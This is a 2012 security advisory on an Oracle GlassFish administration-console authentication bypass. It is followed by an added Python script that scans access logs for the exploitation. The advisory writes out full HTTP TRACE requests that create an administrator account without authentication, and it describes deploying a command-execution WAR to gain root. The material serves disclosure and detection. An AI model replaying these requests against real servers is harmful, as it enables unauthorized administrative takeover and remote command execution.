`=======
Summary
=======
Name: Increased exploitation of Oracle GlassFish Server Administration Console Remote Authentication Bypass Vulnerability
Release Date: 5 January 2012
Reference: NGS00106
Discoverer: David Spencer <[email protected]>
Vendor: Oracle
Vendor Reference:
Systems Affected: Oracle GlassFish Server 2.1 and 3
Risk: High
Status: Published
========
TimeLine
========
Discovered: 26 August 2011
Released: 26 August 2011
Approved: 26 August 2011
Reported: 26 August 2011
Fixed: July 2011
Published: 5 January 2012
===========
Description
===========
Core Security disclosed a bug in Oracle GlassFish Server Administration Console on 5th May 2011, which can be found here:
http://www.securityfocus.com/archive/1/517965/30/0/threaded
and here
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1511
This issue is rated medium because it only returns sensitive information. A full fix has been released by Oracle.
NGS found that it is possible to use this issue to create a GlassFish administrator account as an unauthenticated user.
=================
Technical Details
=================
There is a known authentication bypass in GlassFish: by using the TRACE method rather than the GET method, it is possible to access data meant only for GlassFish administrators.
The following requests were used to create a new GlassFish administrator:
TRACE /common/security/realms/manageUserNew.jsf?name=admin-realm&configName=server-config&bare=true HTTP/1.1
Host: 10.65.78.211:4848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://10.65.78.211:4848/common/security/realms/manageUsers.jsf?name=admin-realm&configName=server-config&bare=true
Cookie: JSESSIONID=ada23501f36f1ec9148589e9a574
This gave access to the create user page. However, it is important that when the submit button is pressed, the resultant POST request is converted to a TRACE request.
TRACE /common/security/realms/manageUserNew.jsf?propertyForm%3ApropertySheet%3ApropertSectionTextField%3AuserIdProp%3AUserId=NGSSecure&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnewPasswordProp%3ANewPassword=Password!!&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AconfirmPasswordProp%3AConfirmPassword=Password!!&propertyForm%3AhelpKey=ref-filerealmusernew.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=-2309913764624097582%3A-2546877703812727807&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.source=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&bare=true&propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.partial.ajax=true HTTP/1.1
Host: 10.65.78.211:4848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.65.78.211:4848/common/security/realms/manageUserNew.jsf?name=admin-realm&configName=server-config&
Content-Length: 0
Cookie: JSESSIONID=ada23501f36f1ec9148589e9a574
Pragma: no-cache
Cache-Control: no-cache
This created a user called NGSSecure with a password of Password!!
NGS then logged on to the GlassFish administration console using this newly created user. Once logged on as this user, it was possible to upload and deploy a website. NGS deployed cmd.war, which allowed the user to run commands in the context of the GlassFish server, which is root by default.
===============
Fix Information
===============
This issue has been fixed in GlassFish 3.1. A workaround also exists: disable the TRACE method on the administrator console's web port.
NGS Secure Research
http://www.ngssecure.com
`
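Added example (not part of the NGS advisory): a log check for the behaviour described above. It flags TRACE requests that the administration console answered with a 2xx status and escalates when the request carries the create-user form's UserId field. It assumes access logging is enabled on the admin listener and written in Common Log Format; the sample lines and the classify/scan names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Common Log Format (not taken from the advisory).
SAMPLE_LOG = """\
192.0.2.10 - - [05/Jan/2012:10:01:02 +0000] "GET /common/index.jsf HTTP/1.1" 302 0
192.0.2.77 - - [05/Jan/2012:10:03:11 +0000] "TRACE /common/security/realms/manageUserNew.jsf?name=admin-realm&configName=server-config&bare=true HTTP/1.1" 200 18231
192.0.2.77 - - [05/Jan/2012:10:03:40 +0000] "TRACE /common/security/realms/manageUserNew.jsf?propertyForm%3ApropertySheet%3ApropertSectionTextField%3AuserIdProp%3AUserId=example-user&javax.faces.partial.ajax=true HTTP/1.1" 200 512
192.0.2.10 - - [05/Jan/2012:10:04:00 +0000] "TRACE / HTTP/1.1" 405 0
"""

# client, timestamp, method, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def classify(line):
    """Return None for lines that are not TRACE requests, else a finding dict."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, when, method, target, status = m.groups()
    if method.upper() != "TRACE":
        return None
    url = urlsplit(target)
    finding = {"client": client, "time": when, "path": url.path,
               "status": int(status), "severity": "low", "user": None}
    # A 2xx answer to TRACE on a console page means the method was not rejected.
    if url.path.endswith(".jsf") and 200 <= int(status) < 300:
        finding["severity"] = "high"
        # parse_qsl percent-decodes keys, so %3AUserId becomes :UserId.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.endswith(":UserId") and url.path.endswith("/manageUserNew.jsf"):
                finding["severity"] = "critical"  # create-user form was submitted
                finding["user"] = value
    return finding


def scan(text):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["client"], f["path"], f["user"] or "")
```

A critical finding names the account to look for in admin-realm; a low finding (TRACE answered with a non-2xx status) is what a console with the workaround applied is expected to produce.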